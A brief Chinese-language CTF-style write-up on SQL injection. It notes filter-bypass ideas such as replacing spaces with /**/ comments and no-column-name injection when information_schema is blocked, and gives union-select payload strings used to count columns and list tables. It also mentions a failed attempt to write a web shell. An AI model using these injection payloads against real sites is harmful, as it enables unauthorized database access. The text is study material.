总结
- 无列名注入
- https://www.cnblogs.com/hello-there/p/12918265.html
- https://www.cnblogs.com/Dark1nt/p/14780958.html
- fuzz过滤词
- 绕过空格
找注入点
各个能输入的地方都试一下找到发布广告
这有注入点,过滤了空格和#
可以用注释绕过
开始测试
1’/**/union/**/select/**/union/**/1,2,3,4,5,6,7,8,9,10’
用hackbar填写比较方便,测出来有22列😅
查用户和表
发现是root用户和web1库
尝试写shell失败
无列名注入
information_schema被过滤
在进行下一步注入的时候
1%27union/**/select/**/1,user(),group_concat(table_name),4,5,6,7,8,9,10,1